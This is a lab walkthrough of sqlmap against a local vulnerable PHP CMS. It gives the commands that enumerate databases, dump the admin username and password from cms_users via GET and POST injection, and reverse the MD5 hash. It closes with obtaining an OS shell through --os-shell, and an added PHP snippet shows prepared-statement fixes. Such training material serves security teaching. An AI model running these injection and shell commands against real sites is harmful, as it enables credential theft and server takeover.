sqlmap basics in practice
Quick reference for sqlmap parameters
parameter | meaning |
---|---|
-u | URL to test for an injection point |
--dbs | list all database names |
--current-user | name of the database user sqlmap is connected as |
--current-db | name of the current database |
-D "cms" --tables | set the target database to cms and list all of its tables |
-T "cms_users" | set the target table to cms_users |
--columns | list all column names of the target table |
-C 'username,password' | restrict the operation to the named target columns |
--dump | dump the contents of the selected columns |
-r | read the HTTP request (method, headers, body) from a file |
--os-shell | under certain conditions, obtains an interactive OS shell on the target directly |
--level 3 | set the detection level to 3 (more tests per parameter) |
--cookie="username=admin" | send the given cookie with the injection requests |
-g | use Google search results as the list of injection targets |
--batch | never ask for user input, always use the default answer |
--random-agent | use a random User-Agent header |
-v 3 | verbosity level 3, which shows the payloads sent |
Lab environment
PHP environment: phpstudy20261103.exe
Lab target: cms
Download address: https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?pwd=jap0
Extraction code: jap0
Obtaining the site's backend administrator password
Use sqlmap injection to obtain the account and password of the site's backend administrator.
List the databases available to the current site
python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" --dbs
Find the current database
python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" --current-db
List the tables in cms
python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" -D "cms" --tables
List the columns of the cms_users table
python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" -D "cms" -T "cms_users" --columns
Dump the admin username and password
python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" -D "cms" -T "cms_users" -C "username,password" --dump
MD5 hash lookup (the dumped password is an unsalted MD5, so it is reversed with a lookup table rather than decrypted)
Hash: e10adc3949ba59abbe56e057f2
POST injection
POST injection via the login form
When I reached this page and tried to log in with a password, I found that it was a POST request, so I needed to use BP to capture the packet.
Here is the captured request:
POST /cms/cms/admin/login.action.php HTTP/1.1
Host: 10.9.75.168
Content-Length: 51
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.9.75.168
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.9.75.168/cms/cms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: username=admin; HFS_SID_=0.912836692063138; PHPSESSID=a71e5r7upv1jm86jc01kvaius2
Connection: close
username=admin&image.x=55&image.y=19&password=admin
Create post.txt in Kali and paste this request into it.
POST injection via sqlmap's -r parameter
Find the current database
python3 sqlmap -r /tmp/post.txt --current-db
List the tables in cms
python3 sqlmap -r /tmp/post.txt -D "cms" --tables
List the columns of the cms_users table
python3 sqlmap -r /tmp/post.txt -D "cms" -T "cms_users" --columns
Dump the admin username and password
python3 sqlmap -r /tmp/post.txt -D "cms" -T "cms_users" -C "username,password" --dump
MD5 hash lookup
Hash: e10adc3949ba59abbe56e057f2
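What both injection points above (show.php?id= and the login form) come down to on the application side, and the fix that removes them, as an added PHP illustration that is not code from the lab CMS or from the original post: the id parameter and the login credentials are spliced into SQL strings, and the login compares an unsalted MD5, which is why the dumped hash was reversible with a lookup table. The cms_article table name, the DSN and the credentials are assumptions; cms_users and its username/password columns come from the walkthrough.

```php
<?php
// Added illustration of the vulnerable pattern beside its hardened form.
// cms_users/username/password come from the walkthrough; cms_article, the DSN
// and the credentials below are assumed placeholders.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=cms;charset=utf8mb4', 'cms_app', 'PLACEHOLDER',
    [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
     PDO::ATTR_EMULATE_PREPARES => false]); // real server-side prepared statements

// VULNERABLE: the untrusted id is spliced into the SQL text, so the boolean,
// UNION and time-based payloads sqlmap appends to ?id=33 run as SQL.
function show_vulnerable(PDO $pdo, string $id): array {
    return $pdo->query("SELECT title, body FROM cms_article WHERE id = $id")->fetchAll();
}

// HARDENED: the value is validated as an integer and travels as a bound
// parameter, never as part of the SQL text, so injected syntax is inert.
function show_safe(PDO $pdo, string $id): array {
    if (!ctype_digit($id)) { http_response_code(400); return []; }
    $st = $pdo->prepare('SELECT title, body FROM cms_article WHERE id = :id');
    $st->execute([':id' => (int)$id]);
    return $st->fetchAll();
}

// VULNERABLE login: string-built query on cms_users plus an unsalted MD5,
// which is both injectable via the POST body and trivially reversible once dumped.
function login_vulnerable(PDO $pdo, string $u, string $p): bool {
    $h = md5($p);
    $sql = "SELECT id FROM cms_users WHERE username='$u' AND password='$h'";
    return (bool)$pdo->query($sql)->fetch();
}

// HARDENED login: bound username, and password_verify() against a slow salted
// hash produced by password_hash() instead of an MD5 string comparison.
function login_safe(PDO $pdo, string $u, string $p): bool {
    $st = $pdo->prepare('SELECT password FROM cms_users WHERE username = :u');
    $st->execute([':u' => $u]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($p, $row['password']);
}
```

With the hardened handlers in place, the --dbs and -r runs above no longer find an injectable parameter, and a dumped password column would hold bcrypt output rather than a lookup-table-sized MD5.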
sqlmap getshell
Using sqlmap's os-shell to get a shell requires the following conditions to be met:
① The physical path of the website is known.
② The website directory is writable.
③ sqlmap is already able to read data out of the database.
os-shell
python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" --os-shell
Select PHP as the server-side language.
Assuming the site's root directory is known, choose the second option and specify the path manually.
Enter the absolute path of the site's root directory:
G:/SOFT/netSecurity/soft/phpstudy2016/phstudy2016-zc/WWW
Obtain the os-shell
Execute a command
Looking at the above results, we can see that we have successfully executed the CMD command.
Note: If executing the cmd command reports an internal error, it is most likely a PHP version problem. My PHP version here is 5.5.